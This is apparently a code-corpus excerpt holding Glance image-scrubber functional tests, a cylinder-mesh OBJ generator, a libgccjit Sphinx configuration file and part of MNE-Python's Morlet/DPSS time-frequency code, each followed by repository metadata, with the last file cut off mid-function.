'X-User-Id': 'f9a41d13-0c13-47e9-bee2-ce4e8bfe958e',
'X-Tenant-Id': uuids.TENANT1,
'X-Roles': 'member',
}
base_headers.update(custom_headers or {})
return base_headers
def _send_create_image_http_request(self, path, body=None):
headers = {
"Content-Type": "application/json",
"X-Roles": "admin",
}
body = body or {'container_format': 'ovf',
'disk_format': 'raw',
'name': 'test_image',
'visibility': 'public'}
body = jsonutils.dumps(body)
return httplib2.Http().request(path, 'POST', body,
self._headers(headers))
def _send_upload_image_http_request(self, path, body=None):
headers = {
"Content-Type": "application/octet-stream"
}
return httplib2.Http().request(path, 'PUT', body,
self._headers(headers))
def _send_http_request(self, path, method):
headers = {
"Content-Type": "application/json"
}
return httplib2.Http().request(path, method, None,
self._headers(headers))
def _get_pending_delete_image(self, image_id):
# In Glance V2, there is no way to get the 'pending_delete' image from
# API. So we get the image from db here for testing.
# Clean the session cache first to avoid connecting to the old db data.
db_api.get_api()._FACADE = None
image = db_api.get_api().image_get(self.admin_context, image_id)
return image
def test_delayed_delete(self):
"""
test that images don't get deleted immediately and that the scrubber
scrubs them
"""
self.cleanup()
kwargs = self.__dict__.copy()
self.start_servers(delayed_delete=True, daemon=True,
metadata_encryption_key='', **kwargs)
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
response, content = self._send_http_request(path, 'DELETE')
self.assertEqual(http_client.NO_CONTENT, response.status)
image = self._get_pending_delete_image(image['id'])
self.assertEqual('pending_delete', image['status'])
self.wait_for_scrub(image['id'])
self.stop_servers()
def test_scrubber_app(self):
"""
test that the glance-scrubber script runs successfully when not in
daemon mode
"""
self.cleanup()
kwargs = self.__dict__.copy()
self.start_servers(delayed_delete=True, daemon=False,
metadata_encryption_key='', **kwargs)
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
response, content = self._send_http_request(path, 'DELETE')
self.assertEqual(http_client.NO_CONTENT, response.status)
image = self._get_pending_delete_image(image['id'])
self.assertEqual('pending_delete', image['status'])
# wait for the scrub time on the image to pass
time.sleep(self.api_server.scrub_time)
# scrub images and make sure they get deleted
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name))
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(0, exitcode)
self.wait_for_scrub(image['id'])
self.stop_servers()
def test_scrubber_delete_handles_exception(self):
"""
Test that the scrubber handles the case where an
exception occurs when _delete() is called. The scrubber
should not write out queue files in this case.
"""
# Start servers.
self.cleanup()
kwargs = self.__dict__.copy()
self.start_servers(delayed_delete=True, daemon=False,
default_store='file', **kwargs)
# Check that we are using a file backend.
self.assertEqual(self.api_server.default_store, 'file')
# add an image
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
# delete the image
response, content = self._send_http_request(path, 'DELETE')
self.assertEqual(http_client.NO_CONTENT, response.status)
# ensure the image is marked pending delete.
image = self._get_pending_delete_image(image['id'])
self.assertEqual('pending_delete', image['status'])
# Remove the file from the backend.
file_path = os.path.join(self.api_server.image_dir, image['id'])
os.remove(file_path)
# Wait for the scrub time on the image to pass
time.sleep(self.api_server.scrub_time)
# run the scrubber app, and ensure it doesn't fall over
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name))
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(0, exitcode)
self.wait_for_scrub(image['id'])
self.stop_servers()
def test_scrubber_app_queue_errors_not_daemon(self):
"""
test that the glance-scrubber exits with an exit code > 0 when it
fails to lookup images, indicating a configuration error when not
in daemon mode.
Related-Bug: #1548289
"""
# Don't start the registry server to cause intended failure
# Don't start the api server to save time
exitcode, out, err = self.scrubber_daemon.start(
delayed_delete=True, daemon=False)
self.assertEqual(0, exitcode,
"Failed to spin up the Scrubber daemon. "
"Got: %s" % err)
# Run the Scrubber
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name))
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(1, exitcode)
self.assertIn('Can not get scrub jobs from queue', str(err))
self.stop_server(self.scrubber_daemon)
def test_scrubber_restore_image(self):
self.cleanup()
kwargs = self.__dict__.copy()
self.start_servers(delayed_delete=True, daemon=False,
metadata_encryption_key='', **kwargs)
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
response, content = self._send_http_request(path, 'DELETE')
self.assertEqual(http_client.NO_CONTENT, response.status)
image = self._get_pending_delete_image(image['id'])
self.assertEqual('pending_delete', image['status'])
def _test_content():
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s --restore %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name, image['id']))
return execute(cmd, raise_error=False)
exitcode, out, err = self.wait_for_scrubber_shutdown(_test_content)
self.assertEqual(0, exitcode)
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
self.stop_servers()
def test_scrubber_restore_active_image_raise_error(self):
self.cleanup()
self.start_servers(delayed_delete=True, daemon=False,
metadata_encryption_key='')
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
def _test_content():
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s --restore %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name, image['id']))
return execute(cmd, raise_error=False)
exitcode, out, err = self.wait_for_scrubber_shutdown(_test_content)
self.assertEqual(1, exitcode)
self.assertIn('cannot restore the image from active to active '
'(wanted from_state=pending_delete)', str(err))
self.stop_servers()
def test_scrubber_restore_image_non_exist(self):
def _test_content():
scrubber = functional.ScrubberDaemon(self.test_dir,
self.policy_file)
scrubber.write_conf(daemon=False)
scrubber.needs_database = True
scrubber.create_database()
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s --restore fake_image_id" %
(exe_cmd, scrubber.conf_file_name))
return execute(cmd, raise_error=False)
exitcode, out, err = self.wait_for_scrubber_shutdown(_test_content)
self.assertEqual(1, exitcode)
self.assertIn('No image found with ID fake_image_id', str(err))
def test_scrubber_restore_image_with_daemon_raise_error(self):
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --daemon --restore fake_image_id" % exe_cmd)
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(1, exitcode)
self.assertIn('The restore and daemon options should not be set '
'together', str(err))
def test_scrubber_restore_image_with_daemon_running(self):
self.cleanup()
self.scrubber_daemon.start(daemon=True)
# Give the scrubber some time to start.
time.sleep(5)
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --restore fake_image_id" % exe_cmd)
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(1, exitcode)
self.assertIn('glance-scrubber is already running', str(err))
self.stop_server(self.scrubber_daemon)
def wait_for_scrubber_shutdown(self, func):
# NOTE(wangxiyuan, rosmaita): The image-restore functionality contains
# a check to make sure the scrubber isn't also running in daemon mode
# to prevent a race condition between a delete and a restore.
        # Sometimes the glance-scrubber process which is set up by the
        # previous test can't be shut down immediately, so if we get the "daemon
# running" message we sleep and try again.
not_down_msg = 'glance-scrubber is already running'
total_wait = 15
for _ in range(total_wait):
exitcode, out, err = func()
if exitcode == 1 and not_down_msg in str(err):
time.sleep(1)
continue
return exitcode, out, err
else:
self.fail('Scrubber did not shut down within {} sec'.format(
total_wait))
def wait_for_scrub(self, image_id):
"""
NOTE(jkoelker) The build servers sometimes take longer than 15 seconds
        to scrub. Give it up to 5 min, checking every 15 seconds.
When/if it flips to deleted, bail immediately.
"""
wait_for = 300 # seconds
check_every = 15 # seconds
for _ in range(wait_for // check_every):
time.sleep(check_every)
image = db_api.get_api().image_get(self.admin_context, image_id)
if (image['status'] == 'deleted' and
image['deleted'] == True):
break
else:
continue
else:
self.fail('image was never scrubbed')
| apache-2.0 | -8,988,473,799,641,938,000 | 40.22439 | 79 | 0.591528 | false |
songrun/HighResWeights-2016 | py-tools/make_cylinder_2D.py | 1 | 9630 | #!/usr/bin/env python
from __future__ import print_function, division
from numpy import *
def make_cylinder( num_slices, num_stacks = 2, cap_uv_distance = 0.1, height = 1. ):
'''
Make a cylinder whose axis is (0,0,-0) to (0,0,1) and radius is 1. This includes the top cap.
The parameters are:
num_slices: an integer >= 3 that determines how many vertices there should be around the circular cross section of the cylinder.
num_stacks: an integer >= 1 that determines how many vertices there should be along the axis of the cylinder.
cap_uv_distance: a positive floating point number that determines how much vertical distance in the UV map is given to each polar cap. It can't be greater than 0.5, because the entire V range is 1.
Returns three floating point arrays containing:
v: positions (xyz)
vt: uvs (uv)
vn: normals (xyz)
Returns three indexing arrays of faces containing:
fv: [ face 0 vertex 0's position index, face 0 vertex 1's position index, face 0 vertex 2's position index ], ...
fvt: [ face 0 vertex 0's uv index, face 0 vertex 1's uv index, face 0 vertex 2's uv index ], ...
fvn: [ face 0 vertex 0's normal index, face 0 vertex 1's normal index, face 0 vertex 2's normal index ], ...
Note that indices are 0-indexed.
'''
assert num_slices >= 3
assert int( num_slices ) == num_slices
assert num_stacks >= 1
assert int( num_stacks ) == num_stacks
assert cap_uv_distance >= 0.
assert cap_uv_distance <= 0.5
print( 'make_cylinder():' )
print( '\tnum_slices:', num_slices )
print( '\tnum_stacks:', num_stacks )
print( '\tcap_uv_distance:', cap_uv_distance )
print( '\theight:', height )
## Let's use the following shape for UVs.
## Every slice of the cylinder will repeat this shape (1D).
## -1
## / \
## 0 1
## | |
## 2 3
## ...
## \ /
## -2
N = num_slices
## We want N thetas around the circle from [0,2*pi);
## for texture coordinates we want N+1 samples from [0,1].
around_ts = linspace( 0, 1, N+1 )
## Parameter around the circle from [0,2*pi).
thetas = 2*pi*around_ts[:-1]
assert len( thetas ) == N
circle = array([ cos(thetas), sin(thetas) ]).T
## Parameter along the cylinder
M = num_stacks
## One stack is a special case.
stack_zs = linspace( 1, -1, M ) if M > 1 else zeros(1)
stack_vs = linspace( cap_uv_distance, 1.0 - cap_uv_distance, M ) if M > 1 else 0.5*ones(1)
assert len( stack_zs ) == M
assert len( stack_vs ) == M
## There will be `num_stacks` copies of the circle,
## and another two vertices, one at the center of the top and one at the center of the bottom.
## Therefore, there will be num_stacks*N + 2 vertices.
## There is one additional texture coordinate per circle, because while
## the last triangle around will share positions with the first triangle around,
## the last texture coordinate won't.
vs = zeros( ( num_stacks*N + 2, 3 ) )
vts = zeros( ( num_stacks*(N+1) + 2, 2 ) )
for i, ( z, v ) in enumerate( zip( stack_zs, stack_vs ) ):
## Every N vertices are the circles.
vs[ i*N : (i+1)*N ] = append( circle, z*ones( ( N, 1 ) ), axis = 1 )
vts[ i*(N+1) : (i+1)*(N+1) ] = append( around_ts[:,newaxis], v*ones( ( N+1, 1 ) ), axis = 1 )
## Next comes the top vertex
vs[ -2 ] = ( 0., 0., 1. )
vts[ -2 ] = ( 0.5, 0. )
## Last comes the bottom vertex
vs[ -1 ] = ( 0., 0., -1. )
vts[ -1 ] = ( 0.5, 1. )
vs[:,-1] *= height
## Vertex normals don't need two copies of the circle, so only len(circle) + 2 vertices.
vns = zeros( ( N + 2, 3 ) )
## The first N normals are the outward normals.
vns[ :-2 ] = append( circle, zeros( ( N, 1 ) ), axis = 1 )
## Next comes the top normal.
vns[ -2 ] = ( 0., 0., 1. )
## Last comes the bottom normal.
vns[ -1 ] = ( 0., 0., -1. )
### Stitch together faces.
### 1 For each vertex in the circle, make a quad connecting the top and bottom to the next vertex around the circle's top and bottom.
### 2 For each vertex in the top circle, make a triangle connecting it and the next vertex around the circle to the center-top vertex.
### 3 For each vertex in the bottom circle, make a triangle connecting it and the next vertex around the circle to the center-bottom vertex.
fv = []
fvn = []
fvt = []
### 1
## Add two triangles from a quad.
def add_quad_triangles_to_list( the_quad, the_list ):
the_list.append( ( the_quad[0], the_quad[1], the_quad[2] ) )
the_list.append( ( the_quad[0], the_quad[2], the_quad[3] ) )
for stack in range( num_stacks-1 ):
for i in range( N ):
## The face will be two triangles made from the quad: top, bottom, bottom+1, top+1
## The relevant vs indices are:
fvi = [ stack*N + i, (stack+1)*N + i, (stack+1)*N + (i+1)%N, stack*N + (i+1)%N ]
## The relevant vns indices are:
fvni = [ i, i, (i+1)%N, (i+1)%N ]
## The relevant vts indices are similar to the fvi indices, but with a different modulus:
fvti = [ stack*(N+1) + i, (stack+1)*(N+1) + i, (stack+1)*(N+1) + (i+1)%(N+1), stack*(N+1) + (i+1)%(N+1) ]
add_quad_triangles_to_list( fvi, fv )
add_quad_triangles_to_list( fvni, fvn )
add_quad_triangles_to_list( fvti, fvt )
### 2
for i in range( N ):
## The face will be the triangle: top, top+1, top-center
## The relevant vs indices are:
fvi = [ i, (i+1)%N, len(vs)-2 ]
## The relevant vns indices are:
fvni = [ N, N, N ]
assert len( vns )-2 == N
## The relevant vts indices are similar to the fvi indices, but with a different modulus:
fvti = [ i, (i+1)%(N+1), len(vts)-2 ]
fv.append( fvi )
fvn.append( fvni )
fvt.append( fvti )
### 3
for i in range( N ):
## The face will be the triangle: bottom+1, bottom, bottom-center
## NOTE: The different order is to maintain CCW orientation
## The relevant vs indices are:
fvi = [ (num_stacks-1)*N + (i+1)%N, (num_stacks-1)*N + i, len(vs)-1 ]
## The relevant vns indices are:
fvni = [ N+1, N+1, N+1 ]
assert len( vns )-1 == N+1
## The relevant vts indices are similar to the fvi indices, but with a different modulus:
fvti = [ (num_stacks-1)*(N+1) + (i+1)%(N+1), (num_stacks-1)*(N+1) + i, len(vts)-1 ]
fv.append( fvi )
fvn.append( fvni )
fvt.append( fvti )
class Struct( object ): pass
result = Struct()
result.vs = vs
result.vts = vts
result.vns = vns
result.fv = fv
result.fvt = fvt
result.fvn = fvn
result.extra = [ 'num_slices: %s' % num_slices, 'num_stacks: %s' % num_stacks, 'cap_uv_distance: %s' % cap_uv_distance, 'height: %s' % height ]
return result
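## A minimal programmatic usage sketch; the slice/stack counts and the output
## filename are arbitrary illustration values, not anything this module requires.
def _example_make_cylinder():
	## 32 vertices around the cross section, 4 along the axis.
	cyl = make_cylinder( 32, num_stacks = 4 )
	## Sanity-check the vertex counts derived in make_cylinder() above.
	assert cyl.vs.shape == ( 32*4 + 2, 3 )
	assert cyl.vts.shape == ( 33*4 + 2, 2 )
	## save_obj() below writes the result as a Wavefront OBJ.
	save_obj( cyl, 'example_cylinder.obj' )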
def save_obj( mesh, filename ):
import os, sys
assert len( mesh.fv ) == len( mesh.fvt )
assert len( mesh.fv ) == len( mesh.fvn )
if os.path.exists( filename ):
print( "ERROR: File exists; save_obj() will not clobber:", filename )
return
with open( filename, 'wb' ) as out:
print( '# Saved by:', *sys.argv, file = out )
for line in mesh.extra:
print( '#', line, file = out )
print( '', file = out )
for v in mesh.vs:
print( 'v', *v, file = out )
print( '', file = out )
for vt in mesh.vts:
print( 'vt', *vt, file = out )
print( '', file = out )
for vn in mesh.vns:
print( 'vn', *vn, file = out )
print( '', file = out )
for fvis, fvtis, fvnis in zip( mesh.fv, mesh.fvt, mesh.fvn ):
print( 'f', end = '', file = out )
## The face index arrays must agree on the number of vertices in the face.
assert len( fvis ) == len( fvtis )
assert len( fvis ) == len( fvnis )
for fvi, fvti, fvni in zip( fvis, fvtis, fvnis ):
print( ' ', end = '', file = out )
## OBJ's are 1-indexed
print( fvi+1, fvti+1, fvni+1, sep = '/', end = '', file = out )
print( '', file = out )
print( "Saved:", filename )
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser( description = 'Save a cylinder as an OBJ.' )
parser.add_argument( 'num_slices', type = int, help = 'The number of vertices around the cylinder.' )
## Optional positional arguments: http://stackoverflow.com/questions/4480075/argparse-optional-positional-arguments
parser.add_argument( 'num_stacks', type = int, default = 2, nargs='?', help = 'The number of vertices along the cylinder.' )
parser.add_argument( 'cap_uv_distance', type = float, default = 0.1, nargs='?', help = 'How much vertical (v) distance in the UV map is given to each polar cap.' )
	parser.add_argument( 'height', type = float, default = 1., nargs='?', help = 'The height of the cylinder.' )
parser.add_argument( 'filename', type = str, help = 'The path to save the resulting OBJ.' )
args = parser.parse_args()
cyl = make_cylinder( args.num_slices, args.num_stacks, args.cap_uv_distance, args.height )
save_obj( cyl, args.filename )
| mit | 1,311,845,705,405,727,700 | 40.688312 | 205 | 0.562513 | false |
iains/darwin-gcc-5 | gcc/jit/docs/conf.py | 46 | 8361 | # -*- coding: utf-8 -*-
#
# libgccjit documentation build configuration file, created by
# sphinx-quickstart on Wed Jul 30 13:39:01 2014.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'libgccjit'
copyright = u'2014-2015 Free Software Foundation, Inc.'
# GCC-specific: extract version information from "gcc" src subdir for
# use in "version" and "release" below.
def __read_file(name):
gcc_srcdir = '../..'
path = os.path.join(gcc_srcdir, name)
if os.path.exists(path):
return open(path).read().strip()
else:
return ''
gcc_BASEVER = __read_file('BASE-VER')
gcc_DEVPHASE = __read_file('DEV-PHASE')
gcc_DATESTAMP = __read_file('DATESTAMP')
gcc_REVISION = __read_file('REVISION')
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = gcc_BASEVER
# The full version, including alpha/beta/rc tags.
release = ('%s (%s %s%s)'
% (gcc_BASEVER, gcc_DEVPHASE, gcc_DATESTAMP,
(' %s' % gcc_REVISION) if gcc_REVISION else ''))
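# For illustration only (the concrete values are hypothetical): with BASE-VER
# "5.0.0", DEV-PHASE "experimental" and DATESTAMP "20150423", the string above
# becomes "5.0.0 (experimental 20150423)"; a non-empty REVISION is appended
# after a further space.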
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'libgccjitdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'libgccjit.tex', u'libgccjit Documentation',
u'David Malcolm', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'libgccjit', u'libgccjit Documentation',
[u'David Malcolm'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'libgccjit', u'libgccjit Documentation',
u'David Malcolm', 'libgccjit', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| gpl-2.0 | -959,297,436,546,340,600 | 31.406977 | 80 | 0.698481 | false |
cmoutard/mne-python | mne/time_frequency/tfr.py | 3 | 54818 | """A module which implements the time frequency estimation.
Morlet code inspired by Matlab code from Sheraz Khan & Brainstorm & SPM
"""
# Authors : Alexandre Gramfort <[email protected]>
# Hari Bharadwaj <[email protected]>
#
# License : BSD (3-clause)
import warnings
from math import sqrt
from copy import deepcopy
import numpy as np
from scipy import linalg
from scipy.fftpack import fftn, ifftn
from ..fixes import partial
from ..baseline import rescale
from ..parallel import parallel_func
from ..utils import logger, verbose, _time_mask
from ..channels.channels import ContainsMixin, UpdateChannelsMixin
from ..io.pick import pick_info, pick_types
from ..io.meas_info import Info
from ..utils import check_fname
from .multitaper import dpss_windows
from ..viz.utils import figure_nobar, plt_show
from ..externals.h5io import write_hdf5, read_hdf5
from ..externals.six import string_types
def _get_data(inst, return_itc):
"""Get data from Epochs or Evoked instance as epochs x ch x time"""
from ..epochs import _BaseEpochs
from ..evoked import Evoked
if not isinstance(inst, (_BaseEpochs, Evoked)):
raise TypeError('inst must be Epochs or Evoked')
if isinstance(inst, _BaseEpochs):
data = inst.get_data()
else:
if return_itc:
raise ValueError('return_itc must be False for evoked data')
data = inst.data[np.newaxis, ...].copy()
return data
def morlet(sfreq, freqs, n_cycles=7, sigma=None, zero_mean=False):
"""Compute Wavelets for the given frequency range
Parameters
----------
    sfreq : float
        Sampling frequency.
    freqs : array
        Frequencies of interest (1 x n_freqs).
    n_cycles : float | array of float
        Number of cycles. Fixed number or one per frequency.
    sigma : float, optional
        It controls the width of the wavelet, i.e. its temporal
        resolution. If sigma is None the temporal resolution
        is adapted with the frequency, as in any wavelet transform:
        the higher the frequency, the shorter the wavelet.
        If sigma is fixed the temporal resolution is fixed,
        as in the short-time Fourier transform, and the number
        of oscillations increases with the frequency.
zero_mean : bool
Make sure the wavelet is zero mean
Returns
-------
Ws : list of array
Wavelets time series
See Also
--------
mne.time_frequency.cwt_morlet : Compute time-frequency decomposition
with Morlet wavelets
"""
Ws = list()
n_cycles = np.atleast_1d(n_cycles)
if (n_cycles.size != 1) and (n_cycles.size != len(freqs)):
raise ValueError("n_cycles should be fixed or defined for "
"each frequency.")
for k, f in enumerate(freqs):
if len(n_cycles) != 1:
this_n_cycles = n_cycles[k]
else:
this_n_cycles = n_cycles[0]
# fixed or scale-dependent window
if sigma is None:
sigma_t = this_n_cycles / (2.0 * np.pi * f)
else:
sigma_t = this_n_cycles / (2.0 * np.pi * sigma)
# this scaling factor is proportional to (Tallon-Baudry 98):
# (sigma_t*sqrt(pi))^(-1/2);
t = np.arange(0., 5. * sigma_t, 1.0 / sfreq)
t = np.r_[-t[::-1], t[1:]]
oscillation = np.exp(2.0 * 1j * np.pi * f * t)
        gaussian_envelope = np.exp(-t ** 2 / (2.0 * sigma_t ** 2))
if zero_mean: # to make it zero mean
real_offset = np.exp(- 2 * (np.pi * f * sigma_t) ** 2)
oscillation -= real_offset
        W = oscillation * gaussian_envelope
W /= sqrt(0.5) * linalg.norm(W.ravel())
Ws.append(W)
return Ws
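# A minimal usage sketch for morlet(); the sampling rate and frequency grid
# below are arbitrary illustration values, not defaults of this module.
def _example_morlet_usage():
    """Build Morlet wavelets for a few frequencies (illustration only)."""
    freqs = np.arange(5., 40., 5.)  # frequencies of interest, in Hz
    Ws = morlet(sfreq=1000., freqs=freqs, n_cycles=7)
    assert len(Ws) == len(freqs)  # one complex wavelet per frequency
    # lower frequencies give longer wavelets, since sigma_t = n_cycles / (2 pi f)
    assert len(Ws[0]) > len(Ws[-1])
    return Ws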
def _dpss_wavelet(sfreq, freqs, n_cycles=7, time_bandwidth=4.0,
zero_mean=False):
"""Compute Wavelets for the given frequency range
Parameters
----------
sfreq : float
Sampling Frequency.
freqs : ndarray, shape (n_freqs,)
The frequencies in Hz.
n_cycles : float | ndarray, shape (n_freqs,)
The number of cycles globally or for each frequency.
Defaults to 7.
time_bandwidth : float, (optional)
Time x Bandwidth product.
The number of good tapers (low-bias) is chosen automatically based on
this to equal floor(time_bandwidth - 1).
Default is 4.0, giving 3 good tapers.
Returns
-------
Ws : list of array
Wavelets time series
"""
Ws = list()
if time_bandwidth < 2.0:
raise ValueError("time_bandwidth should be >= 2.0 for good tapers")
n_taps = int(np.floor(time_bandwidth - 1))
n_cycles = np.atleast_1d(n_cycles)
if n_cycles.size != 1 and n_cycles.size != len(freqs):
raise ValueError("n_cycles should be fixed or defined for "
"each frequency.")
for m in range(n_taps):
Wm = list()
for k, f in enumerate(freqs):
if len(n_cycles) != 1:
this_n_cycles = n_cycles[k]
else:
this_n_cycles = n_cycles[0]
t_win = this_n_cycles / float(f)
t = np.arange(0., t_win, 1.0 / sfreq)
# Making sure wavelets are centered before tapering
oscillation = np.exp(2.0 * 1j * np.pi * f * (t - t_win / 2.))
